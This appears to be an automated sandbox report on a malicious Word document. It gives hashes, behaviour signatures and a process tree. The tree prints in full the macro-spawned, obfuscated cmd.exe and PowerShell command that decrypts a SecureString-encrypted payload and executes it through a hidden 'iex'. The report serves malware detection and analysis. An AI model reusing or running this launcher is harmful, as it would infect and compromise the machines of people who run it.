Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26-05-2024 04:52

General

  • Target

    6a122e231e0bf2a8ab5702f57b524c04JaffaCakes118.doc

  • Size

    143KB

  • MD5

    6a122e231e0bf2a8ab5702f57b524c04

  • SHA1

    375682485ba8d3e0f526a89ca74445da22fa6c8b

  • SHA256

    8338ec1efdc66d060728479ea9d786b9160713f51748f0886ce1fcdb5ed674e4

  • SHA512

    54533ac81f84a46295b3d16ce9af2b6caaddb005c1d530bafa20ee26514c37729b57bf79388d82c01840faecf052c8cd29e32f94b3f4659143c615fae1d034c0

  • SSDEEP

    3072:R5RjSvyEv5naD/tEGjyAoEMWMUmZN24G2iYwi:R5RjSvyEv5nahElkWUKkB2i

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6a122e231e0bf2a8ab5702f57b524c04JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2924
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" auZUDBl UbSMIQQCXcIrQbXws WsAFuOPwdTAn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %hOUTErzjCPZFNvv%=LsuBiOkZwYFVMa&&set %FBrakmc%=p&&set %hBzBsfM%=ow&&set %IhTCbFOdJimEiPO%=GYaEQMUp&&set %sHwKWNd%=!%FBrakmc%!&&set %jSdvWflbWbGsmKU%=jhiPPijVKoSjv&&set %arzcphwUmMIsr%=er&&set %mhlYSdlspDIt%=!%hBzBsfM%!&&set %iQVEaThdhaOM%=s&&set %IJvMdWIcTGdsKhH%=WVvEkVid&&set %MmBoqOFutNNLYC%=he&&set %nXdkKuShfn%=ll&&!%sHwKWNd%!!%mhlYSdlspDIt%!!%arzcphwUmMIsr%!!%iQVEaThdhaOM%!!%MmBoqOFutNNLYC%!!%nXdkKuShfn%! ".((GV '*mdR*').nAme[3,11,2]-joiN'') ( ( new-obJECT managemENT.aUToMatiOn.psCRedEntial ' ',( '76492d1116743f0423413b16050a5345MgB8ADkARgBHAEUAbwBuADgAVQBLAFQAUABRAFoANgBxAGcASQBuAEkASAA2AFEAPQA9AHwAYQA5ADQANgA5AGQANQBmADQANQA2ADQAMAAxAGEAYQAxAGUAMQAyADkAZgA2ADAAZgAxADUAMgA5ADQAYQAzADgAYQBkAGIAMAA0ADAAMgBkADQAYwAxAGYAOAAyAGMANAAyAGUANgA4ADEANgBhAGMAZAAwAGIAMAA4AGIANQAxADMANQA1AGEAZgBhADIANQA1ADgAOQBjAGYAOABiADgAYgBlADAAZQA5ADYAZABmAGQAOQBiADMAOAA4AGIAZABhAGEAZQA0AGEANwA4AGYAYQA0ADMAYwAzADIAYgAwAGEAOAA5ADkAOAA3ADEAYwAxADcAYQBjADAAYQA4AGEAYgA3AGMAMAAwADEAYwA2AGEANQA1ADMAMQA3ADgAMwBiADIANgA5ADEAOQA5ADQAOQA4AGUAZAAyADIANwBiADgAOAA0ADYAOQBiAGQAYgBjAGQANAAzADUAZQA0AGIAMwAyAGMAZQBlAGQAMwA4ADUAYQBkADUAOAAwADEANAA0AGYAMAAyADcAYwBiAGMAZgA1AGEAMABkADQANwA3AGIAZQA2AGEAYgA4AGEAZQBiAGIAMwBhADQANgBkADQANgBlAGQAOABkADQANgBhAGMAOABiAGEAYgBhADQANAAwADEANABjADgAMQBmADAAMwAxADgANwA3ADIAMQBhADcAZAA0ADkAZQAxADUAZQA0ADQANwBhAGEAMAAwADYAOAA1ADkAMwA2ADcANgA2ADEAZQAxAGQAYgA4ADUANgA0AGUAOQA2AGQAYwBkAGQANgBlADUAZAAyADAAYQA4ADUAZQAzADkAZAA1ADIANAA4AGIAYQAwADEAZgBhADgAMAA1AGEAMwA1ADQAOAAxAGIAOQBiADEAZQBhAGMANAAwAGEAYgA1ADcAZQA3ADUAZgAxADgAMQBjAGYAMgAyAGMAMAAyADQAYwAxAGIAMABhAGMANwAwAGUAYwA2AGEANAA5ADMAZQBjADAAOQA5AGEANwBkADkANgBhADkAYwBkAGMANgA1AGMAMgA3ADkAZQA2AGQAOQA3AGMAMwAzADYAYwBhAGEAZgA1ADkAZAA4ADIANwBiAGIAZQBiAGEAZQA3ADMAYQAxAGEAYwBlAGIAZQAyADgAYgAxAGIAMAAzADQANQA4ADQANgBmAGEAZABiADgAOAA2AGIANAA5AGUAMwBiADkAYQA5ADcAYQAzAGYAMwBlADgAYgBiADEANQBkAGMAMwBjADEAZAAxADAAZABhAGEAMAA3ADgANQBkADYAZAA3AGEAZABhADQAYQA1ADkAMwA3AGYANQBhAGMAMgBkADQAMQBmADUAMgBmADAAZAA4ADkAZAAyADAAZAAzADEAZABiAGQAYQBjADIAYgAzAGMAOQBmADkAYwA1AGEANwBhADEAMQBjADQAMAAxAGIANwBlADcAMQAwADIAMgAyADQANwBjADQAMgA1AGUAZgBmAGYAZQBjADkAOQBhADIAOABiADcAMwAyADUANAA3AGEAYQBhAGQAMQBlADMANwBlAGUAYgBkADUAZABlADIAMwBjAGQAMwBhADUAZABkADAAZQA2AGIAMgA3ADgAZQBhAGQAYgA4ADAAZAAzADAAMgBlADQAYQBjADMANwAxADYAZgA0ADUAZQAxADAAMAAzADgANgBkAGYANAAzAGEAMgAxAGIANQBmADcANgBhAGIANABjADEAMgAzAGMAMgA0ADcAMQA2AGQAMgBmADYAMAA0AGMANAAyAGEAYgA2ADEAMgBkADkAOABhADQAYQBiAGYAYwA4ADMAOABiADAAYQBjADEAMABhADEAMgA5ADAAZQBiADkAYQBmADQAOABmADQAYgA1ADMAZgAwADgAOQBkAGQANQBkAGMAOAA2ADgAYQAwADYAOQBhADEAZAAxAGIAMgAzADMAMQAxAGEAMwAxADAANABkAGQAOQA3ADAAOQAzADMAMgBhADEAZQA2ADQAYgBjADYAMgBlADkAMABiAGYAOQA4AGYAOQA5AGYAOAAzAGIANQA5ADMAZgA0AGIAZgA1ADUAYwAxADMANQAwADkANgBjAGQAYQA1AGIAYwBmADcAMwBhADgAOQBkAGUAOQA2AGYANwA4ADAAZQBiADQANAA2AGYAZAAwADkAZQAyAGMAMABkAGYANwA5AGQAOQAyAGMAZgA4ADIANgBlADEAMgBhADAAZAA4AGEANwBjADUAYgBhADkANwA2ADYAYgBkAGYAMABjAGMANAA1ADgAYQBhAGIAZgBiADcAMQA5AGUANgBlADUAMwA3ADQAOAA4AGQAMgA2ADMANQBmAGIAZQA5ADMANwBlAGEANQBkADgAMwBiAGQAYgBiADkAOABhADcAMAAwADMAZgBhADQAMAAxAGEANwA3AGQAMAA0ADUAZQBlAGEAZABlAGMAZgA2ADkAOABlAGUANwA3ADcANwAyADEAMgA2ADEANgAyADUANQAxAGMANgA3ADIAMgBlAGYAYgAzAGIAYwBkAGUAMgBmADgAMABhADkAZABkADkAMgBmADMAOQA0ADAAYQA4AGMANQBhAGUAMQA5ADgANAAxAGMAOQA2ADUAZgBkADcAMwA1ADUAOQBlAGUAZAA0ADUAZQAwAGEAOQBhADMANgBhAGUAZAA5ADEAMgBhADUANwAzAGMAZgBiAGMANgA4ADcAZAAxAGQAOQA0AGEANwAyADQAZQBlAGIAZgBmADQAOAA4AGUAOQA3ADIANQBkADkANgA0ADQAYwBjADgAMABjAGIAYwBhADYAYwA2AGQAYwAyADcAMgA1ADkAZgBhAGEAZABlADkANgBiAGYANgBkAGEAMQBjAGEAYQA0ADcAOAAxADYAZQBkAGEAMwBhADUAMAAyADUAMwBmAGYANQAwAGYANgBkADUAMwA1AGQAMAAyAGYAOQBmADYANgAwADMANgBiADIAMgA1ADUAOAAzADkAZQA3ADQAOQBlADIAYQAwAGQAYgA5ADQAMgA3ADAAYwAzAGYAYQAzAGYAYgBmADAAMAA1AGUAZAAzAGEANAAzAGIAZABhADQAMgBkADIAOQA1ADQAOAA5ADgANgA1ADEAYwA1AGQAZQA5ADkANwBmADcAZQBjADYAZAAwAGUANQAzADEAYQBjAGQAMgA1AGMAMQAyAGMANAAzADkAMgBjADYAZgBiAGUANAA0ADUAZAAwAGQAYQBmADgAMgA3ADIANAAyADEANgAwADQAMgA2ADEANABjADEAOQA5AGIANQAwADQAZAA2AGMAYQBiAGMAYgAzADUANwA4ADcANAAxADAAOAAwADMANQA1ADQAZABhADMANwBkADUAZABjADEAYgA3ADQANQAyADEAZABkADMAZAAxAGEANQAzAGUANQAzAGEAOAA5ADkAZABiADcAZABiADMANgA5ADcANQBjAGQAMAA0ADkANQAwADcAYgA5ADUAYQBiADgAZQA4ADQAZgA4ADYAZgBhAGUAOABhADcAYwBiADkAMwA0AGYANwAwADEANwA2AGUAZQA0ADcAYQA3ADkAMwAwAGQANgBlADcAYwAzAGIANABiAGUAOAA4ADUAZQBmADIAMgAyAGMAOQAwAGYAZgAxADQAOQBiADkAYgAyAGUANwA3AGQAOQAzADEAYQAwAGQANgBjADgANABmAGUAZgAxAGQAZQBhADQAOABhADUAYQA3ADYAOABhADgAMwAwADIAYQA5ADUAYgA3ADAAMQBmAGEANwA1AGMAOABjAGMAOQBhAGQAYQA2ADUANAA2ADAAZQBlADgAMQBiADkANwBiADQANABjADQAOAA1ADEANgBjAGIAMQAyAGUANQA2AGQAZQA0ADMAZABjADEAYgA3AGQAYgA3AGYAZgBlADkAYQA5AGMAMgAzAGMAZgA3AGMAMwBjAGYANgBjAGYAOQBmADUAMAAzAGIAYwAzADIAOQBkAGUAOQBjADMANQAwADUANQBmADkAYwA1AGEAZQBkAGYANQAzADMAYwA4ADQAMQBmADUAYwA4AGUAMQAyAGEAZQAzADgANgAzADUAZABjADcAYwBiADQANgA0ADgAMQBhADQAYQBjADYAYwA2ADcAZgBiADYAYwBmAGIAOABlADEANwA2AGEAMgAwADcAMwBiAGUANQA3ADQANgBkAGYANQBlAGYAMAA0ADgAZQA2ADEAMQBkADEANQAwAGMANQA2ADUAOABmADYAZQA1ADAANwA5ADMAMAA5ADcANAA4AGQANwA3AGUAMABkADAAOAAzADQAMwBiAGQAMQA1ADUAMgBhADEAMgAyADcAMAAyADcANAA2AGEAYgA4ADUAYgAzADkAMABlAGMANQA3AGMAYwAzADUAZQA5ADEAYQBlAGEANQBhADIAYgBhAGQAZgBlADIAZgAzADQAMQBlADkAMABiADEAZgA0ADkANgAwAGIAOAAwAGMAMQBmAGMAOQBlAGUAYgA3ADMAZABjAGMAOQA1AGUAZgA1AGMAMgAyAGQAOAA5AGIAOQBkADEANAA2ADYANwAwADAANgA0AGUAYQA4AGIAMgAyAGEAZABjADgAOAA3AGEAYQA5AGMAZQBmADkAMwBmAGQAYQBlADUANgA5ADAAYQBiAGMANAA5AGUANAA2ADgAMgA3ADQAMABlADUAMgAwADAANgBlADkAZQA4AGUAMABmADIAYQBkAGMAYgBlADMANQA2ADEANAA5ADcANgBiAGEAYwBhADMAZgBjADIAZQBkADcAZAAwADUANABmADYANQBmAGEAZAA5AGYAMAA0ADEANwA5AGUAYgAwADUAYgA0AGMANABhADEAMgBhADIANwBiAGQAOABjADgAMQBhAGUAZQA1AGYAMABiADcAZQA1ADUANwAxAGEAMQA2ADUAMwA4ADIAYgA1ADAANwA2ADIAYQA4AGMAOAA5AGIAYwBmAGMAMAA3AGMAMQA0ADIANQAxAGEANwAwADIAZQA5ADEAMAA2ADIANABkAGMAMQAzADMANgA3ADgAYQAwADQAOABjADUAOQBiADkANwAxADQAMQAwAGMAYQA0ADUAZAAzADUANwA2ADYAOABkAGYAMgA0ADQAYwBmAGQAMQA3AGYANgA5ADUAOAAxAGIAMwBkADgAZgBhADQAZgAzAGUANQA5ADQAZAAxADQANABiADIANQBlADMANgA1AGMAYgAyADQANABjAGEAOAAyADcANABjADgAOAA2ADIANQBiADMAYwA3ADMAYgA1ADUAMQA0ADQANABiADcAOQBkAGIAMwBhAGIAYQBjAGIAZQBmADAAMQBhADgANQA4ADEAZgBlADIAOAA2AGIAMQAwADgAMAA5ADEANwA0ADgAMgA0ADMANwBiADUAZgAxAGEANgA0ADEANQA3AGEANgAxADYANABlAGEANQA5AA==' | CoNvERTTO-SecUreStrInG -K (132..101) ) ).gEtNetwoRkcrEDentIaL().pASSwORd)
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1992
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell ".((GV '*mdR*').nAme[3,11,2]-joiN'') ( ( new-obJECT managemENT.aUToMatiOn.psCRedEntial ' ',( '76492d1116743f0423413b16050a5345MgB8ADkARgBHAEUAbwBuADgAVQBLAFQAUABRAFoANgBxAGcASQBuAEkASAA2AFEAPQA9AHwAYQA5ADQANgA5AGQANQBmADQANQA2ADQAMAAxAGEAYQAxAGUAMQAyADkAZgA2ADAAZgAxADUAMgA5ADQAYQAzADgAYQBkAGIAMAA0ADAAMgBkADQAYwAxAGYAOAAyAGMANAAyAGUANgA4ADEANgBhAGMAZAAwAGIAMAA4AGIANQAxADMANQA1AGEAZgBhADIANQA1ADgAOQBjAGYAOABiADgAYgBlADAAZQA5ADYAZABmAGQAOQBiADMAOAA4AGIAZABhAGEAZQA0AGEANwA4AGYAYQA0ADMAYwAzADIAYgAwAGEAOAA5ADkAOAA3ADEAYwAxADcAYQBjADAAYQA4AGEAYgA3AGMAMAAwADEAYwA2AGEANQA1ADMAMQA3ADgAMwBiADIANgA5ADEAOQA5ADQAOQA4AGUAZAAyADIANwBiADgAOAA0ADYAOQBiAGQAYgBjAGQANAAzADUAZQA0AGIAMwAyAGMAZQBlAGQAMwA4ADUAYQBkADUAOAAwADEANAA0AGYAMAAyADcAYwBiAGMAZgA1AGEAMABkADQANwA3AGIAZQA2AGEAYgA4AGEAZQBiAGIAMwBhADQANgBkADQANgBlAGQAOABkADQANgBhAGMAOABiAGEAYgBhADQANAAwADEANABjADgAMQBmADAAMwAxADgANwA3ADIAMQBhADcAZAA0ADkAZQAxADUAZQA0ADQANwBhAGEAMAAwADYAOAA1ADkAMwA2ADcANgA2ADEAZQAxAGQAYgA4ADUANgA0AGUAOQA2AGQAYwBkAGQANgBlADUAZAAyADAAYQA4ADUAZQAzADkAZAA1ADIANAA4AGIAYQAwADEAZgBhADgAMAA1AGEAMwA1ADQAOAAxAGIAOQBiADEAZQBhAGMANAAwAGEAYgA1ADcAZQA3ADUAZgAxADgAMQBjAGYAMgAyAGMAMAAyADQAYwAxAGIAMABhAGMANwAwAGUAYwA2AGEANAA5ADMAZQBjADAAOQA5AGEANwBkADkANgBhADkAYwBkAGMANgA1AGMAMgA3ADkAZQA2AGQAOQA3AGMAMwAzADYAYwBhAGEAZgA1ADkAZAA4ADIANwBiAGIAZQBiAGEAZQA3ADMAYQAxAGEAYwBlAGIAZQAyADgAYgAxAGIAMAAzADQANQA4ADQANgBmAGEAZABiADgAOAA2AGIANAA5AGUAMwBiADkAYQA5ADcAYQAzAGYAMwBlADgAYgBiADEANQBkAGMAMwBjADEAZAAxADAAZABhAGEAMAA3ADgANQBkADYAZAA3AGEAZABhADQAYQA1ADkAMwA3AGYANQBhAGMAMgBkADQAMQBmADUAMgBmADAAZAA4ADkAZAAyADAAZAAzADEAZABiAGQAYQBjADIAYgAzAGMAOQBmADkAYwA1AGEANwBhADEAMQBjADQAMAAxAGIANwBlADcAMQAwADIAMgAyADQANwBjADQAMgA1AGUAZgBmAGYAZQBjADkAOQBhADIAOABiADcAMwAyADUANAA3AGEAYQBhAGQAMQBlADMANwBlAGUAYgBkADUAZABlADIAMwBjAGQAMwBhADUAZABkADAAZQA2AGIAMgA3ADgAZQBhAGQAYgA4ADAAZAAzADAAMgBlADQAYQBjADMANwAxADYAZgA0ADUAZQAxADAAMAAzADgANgBkAGYANAAzAGEAMgAxAGIANQBmADcANgBhAGIANABjADEAMgAzAGMAMgA0ADcAMQA2AGQAMgBmADYAMAA0AGMANAAyAGEAYgA2ADEAMgBkADkAOABhADQAYQBiAGYAYwA4ADMAOABiADAAYQBjADEAMABhADEAMgA5ADAAZQBiADkAYQBmADQAOABmADQAYgA1ADMAZgAwADgAOQBkAGQANQBkAGMAOAA2ADgAYQAwADYAOQBhADEAZAAxAGIAMgAzADMAMQAxAGEAMwAxADAANABkAGQAOQA3ADAAOQAzADMAMgBhADEAZQA2ADQAYgBjADYAMgBlADkAMABiAGYAOQA4AGYAOQA5AGYAOAAzAGIANQA5ADMAZgA0AGIAZgA1ADUAYwAxADMANQAwADkANgBjAGQAYQA1AGIAYwBmADcAMwBhADgAOQBkAGUAOQA2AGYANwA4ADAAZQBiADQANAA2AGYAZAAwADkAZQAyAGMAMABkAGYANwA5AGQAOQAyAGMAZgA4ADIANgBlADEAMgBhADAAZAA4AGEANwBjADUAYgBhADkANwA2ADYAYgBkAGYAMABjAGMANAA1ADgAYQBhAGIAZgBiADcAMQA5AGUANgBlADUAMwA3ADQAOAA4AGQAMgA2ADMANQBmAGIAZQA5ADMANwBlAGEANQBkADgAMwBiAGQAYgBiADkAOABhADcAMAAwADMAZgBhADQAMAAxAGEANwA3AGQAMAA0ADUAZQBlAGEAZABlAGMAZgA2ADkAOABlAGUANwA3ADcANwAyADEAMgA2ADEANgAyADUANQAxAGMANgA3ADIAMgBlAGYAYgAzAGIAYwBkAGUAMgBmADgAMABhADkAZABkADkAMgBmADMAOQA0ADAAYQA4AGMANQBhAGUAMQA5ADgANAAxAGMAOQA2ADUAZgBkADcAMwA1ADUAOQBlAGUAZAA0ADUAZQAwAGEAOQBhADMANgBhAGUAZAA5ADEAMgBhADUANwAzAGMAZgBiAGMANgA4ADcAZAAxAGQAOQA0AGEANwAyADQAZQBlAGIAZgBmADQAOAA4AGUAOQA3ADIANQBkADkANgA0ADQAYwBjADgAMABjAGIAYwBhADYAYwA2AGQAYwAyADcAMgA1ADkAZgBhAGEAZABlADkANgBiAGYANgBkAGEAMQBjAGEAYQA0ADcAOAAxADYAZQBkAGEAMwBhADUAMAAyADUAMwBmAGYANQAwAGYANgBkADUAMwA1AGQAMAAyAGYAOQBmADYANgAwADMANgBiADIAMgA1ADUAOAAzADkAZQA3ADQAOQBlADIAYQAwAGQAYgA5ADQAMgA3ADAAYwAzAGYAYQAzAGYAYgBmADAAMAA1AGUAZAAzAGEANAAzAGIAZABhADQAMgBkADIAOQA1ADQAOAA5ADgANgA1ADEAYwA1AGQAZQA5ADkANwBmADcAZQBjADYAZAAwAGUANQAzADEAYQBjAGQAMgA1AGMAMQAyAGMANAAzADkAMgBjADYAZgBiAGUANAA0ADUAZAAwAGQAYQBmADgAMgA3ADIANAAyADEANgAwADQAMgA2ADEANABjADEAOQA5AGIANQAwADQAZAA2AGMAYQBiAGMAYgAzADUANwA4ADcANAAxADAAOAAwADMANQA1ADQAZABhADMANwBkADUAZABjADEAYgA3ADQANQAyADEAZABkADMAZAAxAGEANQAzAGUANQAzAGEAOAA5ADkAZABiADcAZABiADMANgA5ADcANQBjAGQAMAA0ADkANQAwADcAYgA5ADUAYQBiADgAZQA4ADQAZgA4ADYAZgBhAGUAOABhADcAYwBiADkAMwA0AGYANwAwADEANwA2AGUAZQA0ADcAYQA3ADkAMwAwAGQANgBlADcAYwAzAGIANABiAGUAOAA4ADUAZQBmADIAMgAyAGMAOQAwAGYAZgAxADQAOQBiADkAYgAyAGUANwA3AGQAOQAzADEAYQAwAGQANgBjADgANABmAGUAZgAxAGQAZQBhADQAOABhADUAYQA3ADYAOABhADgAMwAwADIAYQA5ADUAYgA3ADAAMQBmAGEANwA1AGMAOABjAGMAOQBhAGQAYQA2ADUANAA2ADAAZQBlADgAMQBiADkANwBiADQANABjADQAOAA1ADEANgBjAGIAMQAyAGUANQA2AGQAZQA0ADMAZABjADEAYgA3AGQAYgA3AGYAZgBlADkAYQA5AGMAMgAzAGMAZgA3AGMAMwBjAGYANgBjAGYAOQBmADUAMAAzAGIAYwAzADIAOQBkAGUAOQBjADMANQAwADUANQBmADkAYwA1AGEAZQBkAGYANQAzADMAYwA4ADQAMQBmADUAYwA4AGUAMQAyAGEAZQAzADgANgAzADUAZABjADcAYwBiADQANgA0ADgAMQBhADQAYQBjADYAYwA2ADcAZgBiADYAYwBmAGIAOABlADEANwA2AGEAMgAwADcAMwBiAGUANQA3ADQANgBkAGYANQBlAGYAMAA0ADgAZQA2ADEAMQBkADEANQAwAGMANQA2ADUAOABmADYAZQA1ADAANwA5ADMAMAA5ADcANAA4AGQANwA3AGUAMABkADAAOAAzADQAMwBiAGQAMQA1ADUAMgBhADEAMgAyADcAMAAyADcANAA2AGEAYgA4ADUAYgAzADkAMABlAGMANQA3AGMAYwAzADUAZQA5ADEAYQBlAGEANQBhADIAYgBhAGQAZgBlADIAZgAzADQAMQBlADkAMABiADEAZgA0ADkANgAwAGIAOAAwAGMAMQBmAGMAOQBlAGUAYgA3ADMAZABjAGMAOQA1AGUAZgA1AGMAMgAyAGQAOAA5AGIAOQBkADEANAA2ADYANwAwADAANgA0AGUAYQA4AGIAMgAyAGEAZABjADgAOAA3AGEAYQA5AGMAZQBmADkAMwBmAGQAYQBlADUANgA5ADAAYQBiAGMANAA5AGUANAA2ADgAMgA3ADQAMABlADUAMgAwADAANgBlADkAZQA4AGUAMABmADIAYQBkAGMAYgBlADMANQA2ADEANAA5ADcANgBiAGEAYwBhADMAZgBjADIAZQBkADcAZAAwADUANABmADYANQBmAGEAZAA5AGYAMAA0ADEANwA5AGUAYgAwADUAYgA0AGMANABhADEAMgBhADIANwBiAGQAOABjADgAMQBhAGUAZQA1AGYAMABiADcAZQA1ADUANwAxAGEAMQA2ADUAMwA4ADIAYgA1ADAANwA2ADIAYQA4AGMAOAA5AGIAYwBmAGMAMAA3AGMAMQA0ADIANQAxAGEANwAwADIAZQA5ADEAMAA2ADIANABkAGMAMQAzADMANgA3ADgAYQAwADQAOABjADUAOQBiADkANwAxADQAMQAwAGMAYQA0ADUAZAAzADUANwA2ADYAOABkAGYAMgA0ADQAYwBmAGQAMQA3AGYANgA5ADUAOAAxAGIAMwBkADgAZgBhADQAZgAzAGUANQA5ADQAZAAxADQANABiADIANQBlADMANgA1AGMAYgAyADQANABjAGEAOAAyADcANABjADgAOAA2ADIANQBiADMAYwA3ADMAYgA1ADUAMQA0ADQANABiADcAOQBkAGIAMwBhAGIAYQBjAGIAZQBmADAAMQBhADgANQA4ADEAZgBlADIAOAA2AGIAMQAwADgAMAA5ADEANwA0ADgAMgA0ADMANwBiADUAZgAxAGEANgA0ADEANQA3AGEANgAxADYANABlAGEANQA5AA==' | CoNvERTTO-SecUreStrInG -K (132..101) ) ).gEtNetwoRkcrEDentIaL().pASSwORd)
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      9338709512ade5ae71fca39002097c1c

      SHA1

      67701e6818bab210e0cd40600717b80fe76ddfb0

      SHA256

      1fedb5d7a44ffd545b59f5f344fad1ca3068d724bb85fcda045dc5843e60749c

      SHA512

      45de8850a19429d0ee3cd225c935678519c44e45eb9b9cdb9e284886cdc490ff29f6d5db2b614faee8a3578fed70f32d04660a94c28dc2d86b03c6d3b39d63c3

    • memory/2040-27-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2040-7-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-10-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-11-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-8-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-34-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-14-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-15-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-13-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-16-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-12-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-22-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-21-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-64-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-2-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-6-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-36-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-37-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-35-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-30-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-29-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-24-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-23-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-28-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-20-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2040-47-0x0000000071A5D000-0x0000000071A68000-memory.dmp

      Filesize

      44KB

    • memory/2040-48-0x0000000000630000-0x0000000000730000-memory.dmp

      Filesize

      1024KB

    • memory/2040-0-0x000000002F2F1000-0x000000002F2F2000-memory.dmp

      Filesize

      4KB

    • memory/2884-46-0x00000000061F0000-0x000000000622A000-memory.dmp

      Filesize

      232KB

    • memory/2884-45-0x0000000006160000-0x0000000006198000-memory.dmp

      Filesize

      224KB